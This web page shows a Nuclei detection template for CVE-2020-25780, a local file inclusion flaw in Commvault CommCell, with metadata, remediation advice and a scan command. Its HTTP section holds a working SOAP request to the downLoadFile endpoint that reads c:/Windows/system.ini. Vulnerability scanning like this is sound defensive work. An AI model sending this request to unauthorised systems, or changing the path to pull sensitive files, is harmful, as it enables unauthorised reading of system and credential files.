Skip to content
Nuclei Templates

Commvault CommCell - Local File Inclusion

ID: CVE-2020-25780

Severity: high

Author: pdteam

Tags: cve,cve2020,commvault,lfi

Description

Section titled “Description”

CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.

YAML Source

Section titled “YAML Source”
id: CVE-2020-25780


info:
  name: Commvault CommCell - Local File Inclusion
  author: pdteam
  severity: high
  description: CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13 are vulnerable to local file inclusion because an attacker can view a log file can instead view a file outside of the log-files folder.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.
  remediation: |
    Apply the latest security patches or updates provided by Commvault to fix the local file inclusion vulnerability.
  reference:
    - https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
    - http://kb.commvault.com/article/63264
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25780
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-25780
    cwe-id: CWE-22
    epss-score: 0.0562
    epss-percentile: 0.93279
    cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: commvault
    product: commcell
  tags: cve,cve2020,commvault,lfi


http:
  - method: POST
    path:
      - "http://{{Host}}:81/SearchSvc/CVSearchService.svc"


    body: |
      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
         <soapenv:Header/>
         <soapenv:Body>
            <tem:downLoadFile>
               <tem:path>c:/Windows/system.ini</tem:path>
            </tem:downLoadFile>
         </soapenv:Body>
      </soapenv:Envelope>


    headers:
      Cookie: Login
      soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile
      content-type: text/xml


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "downLoadFileResult"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a437411db25ad1009d4f6fbe3c3846b5f5dcf6bf2e2cdbc4ec33a0582458a72d022100e77f40da2e31c10b79cbfdb78b24ed872f05fc2f873d8e2851929ea329c71975:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-25780.yaml"

View on Github